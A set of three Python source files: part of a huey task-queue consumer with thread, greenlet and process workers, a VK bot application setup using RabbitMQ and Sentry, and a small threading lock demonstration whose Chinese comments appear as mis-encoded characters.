ThreadEnvironment(Environment): def get_stop_flag(self): return threading.Event() def create_process(self, runnable, name): t = threading.Thread(target=runnable, name=name) t.daemon = True return t class GreenletEnvironment(Environment): def get_stop_flag(self): return GreenEvent() def create_process(self, runnable, name): def run_wrapper(): gevent.sleep() runnable() gevent.sleep() return Greenlet(run=run_wrapper) class ProcessEnvironment(Environment): def get_stop_flag(self): return ProcessEvent() def create_process(self, runnable, name): p = Process(target=runnable, name=name) p.daemon = True return p worker_to_environment = { 'thread': ThreadEnvironment, 'greenlet': GreenletEnvironment, 'gevent': GreenletEnvironment, # Same as greenlet. 'process': ProcessEnvironment, } class Consumer(object): def __init__(self, huey, workers=1, periodic=True, initial_delay=0.1, backoff=1.15, max_delay=10.0, utc=True, scheduler_interval=1, worker_type='thread'): self._logger = logging.getLogger('huey.consumer') self.huey = huey self.workers = workers self.periodic = periodic self.default_delay = initial_delay self.backoff = backoff self.max_delay = max_delay self.utc = utc self.scheduler_interval = max(min(scheduler_interval, 60), 1) self.worker_type = worker_type if worker_type not in worker_to_environment: raise ValueError('worker_type must be one of %s.' % ', '.join(worker_to_environment)) else: self.environment = worker_to_environment[worker_type]() self._received_signal = False self.stop_flag = self.environment.get_stop_flag() scheduler = self._create_runnable(self._create_scheduler()) self.scheduler = self.environment.create_process( scheduler, 'Scheduler') self.worker_threads = [] for i in range(workers): worker = self._create_runnable(self._create_worker()) self.worker_threads.append(self.environment.create_process( worker, 'Worker-%d' % (i + 1))) def _create_worker(self): return Worker( huey=self.huey, default_delay=self.default_delay, max_delay=self.max_delay, backoff=self.backoff, utc=self.utc) def _create_scheduler(self): return Scheduler( huey=self.huey, interval=self.scheduler_interval, utc=self.utc, periodic=self.periodic) def _create_runnable(self, consumer_process): def _run(): try: while not self.stop_flag.is_set(): consumer_process.loop() except KeyboardInterrupt: pass return _run def metadata(self, **kwargs): for key, value in kwargs.items(): self.huey.write_metadata(key, value) def initialize_metadata(self): # Set metadata. self.metadata( periodic_tasks='enabled' if self.periodic else 'disabled', scheduler_interval=self.scheduler_interval, tasks_duration=0.0, tasks_errors=0, tasks_executed=0, tasks_scheduled=0, workers=self.workers, worker_type=self.worker_type, ) for command in registry._registry: self.metadata(**{ command + '_duration': 0, command + '_errors': 0, command + '_executed': 0, command + '_scheduled': 0}) def read_metadata(self): keys = [ 'periodic_tasks', 'scheduler_interval', 'tasks_duration', 'tasks_errors', 'tasks_executed', 'tasks_scheduled', 'workers', 'worker_type', ] for command in registry._registry: keys.extend([ command + '_duration', command + '_errors', command + '_executed', command + '_scheduled']) data = {} for key in keys: data[key] = self.huey.read_metadata(key) def start(self): # Log startup message. self._logger.info('Huey consumer started with %s %s, PID %s' % ( self.workers, self.worker_type, os.getpid())) self._logger.info('Scheduler runs every %s seconds.' % ( self.scheduler_interval)) self._logger.info('Periodic tasks are %s.' % ( 'enabled' if self.periodic else 'disabled')) self._set_signal_handler() msg = ['The following commands are available:'] for command in registry._registry: msg.append('+ %s' % command.replace('queuecmd_', '')) self._logger.info('\n'.join(msg)) self.scheduler.start() for worker in self.worker_threads: worker.start() def stop(self): self.stop_flag.set() self._logger.info('Shutting down') def run(self): self.start() while True: try: is_set = self.stop_flag.wait(timeout=0.1) time.sleep(0.1) except KeyboardInterrupt: self.stop() except: self._logger.exception('Error in consumer.') self.stop() else: if self._received_signal: self.stop() if self.stop_flag.is_set(): break self._logger.info('Consumer exiting.') def _set_signal_handler(self): signal.signal(signal.SIGTERM, self._handle_signal) def _handle_signal(self, sig_num, frame): self._logger.info('Received SIGTERM') self._received_signal = True
app.py
import logging from vk import VK from vk.bot_framework import Dispatcher from vk.utils import TaskManager from db.prestart import pre_start as pre_start_db from shuecm.config import LOGGING_LEVEL from shuecm.config import PRODUCTION from shuecm.config import SENTRY_DSN from shuecm.config import VK_GROUP_ID from shuecm.config import VK_TOKEN logging.basicConfig(level=LOGGING_LEVEL) logger = logging.getLogger("shuecm.app") vk = VK(VK_TOKEN) dp = Dispatcher(vk, VK_GROUP_ID) def setup_sentry(): """ Setup sentry in application. # TODO: move to utils.py. :return: """ if PRODUCTION and SENTRY_DSN: import sentry_sdk sentry_sdk.init(SENTRY_DSN) logger.info("Sentry succesfully initialized!") else: logger.info( "Sentry DSN not found or PRODUCTION variable is false. Sentry do not initialized." ) def setup_blueprints(): """ Register blueprints in applcation. :return: """ from shuecm.blueprints import info_bp, user_bp, admin_bp, role_bp dp.setup_blueprint(info_bp) logger.info("Informational blueprint succesfully initialized!") dp.setup_blueprint(user_bp) logger.info("User blueprint succesfully initialized!") dp.setup_blueprint(admin_bp) logger.info("Administration blueprint succesfully initialized!") dp.setup_blueprint(role_bp) logger.info("Role blueprint succesfully initialized!") def setup_middlewares(): """ Register middlewares in application. :return: """ from shuecm.middlewares import ( UsersRegistrationMiddleware, BotAdminMiddleware, ChatsRegistrationMiddleware, ) dp.setup_middleware(BotAdminMiddleware()) dp.setup_middleware(ChatsRegistrationMiddleware()) dp.setup_middleware(UsersRegistrationMiddleware()) def setup_rules(): """ Register rules for blueprints :return: """ from shuecm.rules import Texts, UserHavePermission, TextsWithArgs dp.setup_rule(UserHavePermission) dp.setup_rule(TextsWithArgs) dp.setup_rule(Texts) async def run(): # check database before start await pre_start_db(vk.loop) # setup sentry error tracking setup_sentry() # setup bot rules; blueprints doesn`t work without rules. setup_rules() # setup blueprints (add commands to bot) setup_blueprints() # setup middlewares for user authorization, etc. setup_middlewares() if not PRODUCTION: # Polling used only for tests. # Do not use it in production, polling may skip any events (thanks to VK-API ;) ) # Also polling not scalable, really. dp.run_polling() elif PRODUCTION: # We use rabbitmq for event dispatching. # You can run this code in many processes (via multiprocessing module) # for more performance or run many instances of application. from vk.bot_framework.extensions.rabbitmq import RabbitMQ dp.setup_extension(RabbitMQ) dp.run_extension("rabbitmq", vk=vk, queue_name="test_queue") def start(): """Run many workers of rabbitmq receiver""" manager = TaskManager(vk.loop) manager.add_task(run) manager.run() if __name__ == "__main__": # Wrapper over asyncio if PRODUCTION: import multiprocessing as mp processes = [] for i in range(1, 6): process = mp.Process(target=start) processes.append(process) logger.info(f"[{i}] process added!") for index, process in enumerate(processes, start=1): process.start() logger.info(f"[{index}] process started!") else: manager = TaskManager(vk.loop) manager.add_task(run) manager.run()
do_lock.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import time, threading # ๅ‡ๅฎš่ฟ™ๆ˜ฏไฝ ็š„้“ถ่กŒๅญ˜ๆฌพ: balance = 0 lock = threading.Lock() def change_it(n): # ๅ…ˆๅญ˜ๅŽๅ–๏ผŒ็ป“ๆžœๅบ”่ฏฅไธบ0: global balance balance = balance + n balance = balance - n def run_thread(n): for i in range(100000): # ๅ…ˆ่ฆ่Žทๅ–้”: lock.acquire() try: # ๆ”พๅฟƒๅœฐๆ”นๅง: change_it(n) finally: # ๆ”นๅฎŒไบ†ไธ€ๅฎš่ฆ้‡Šๆ”พ้”: lock.release() t1 = threading.Thread(target=run_thread, args=(5,)) t2 = threading.Thread(target=run_thread, args=(8,)) t1.start() t2.start() t1.join() t2.join() print(balance)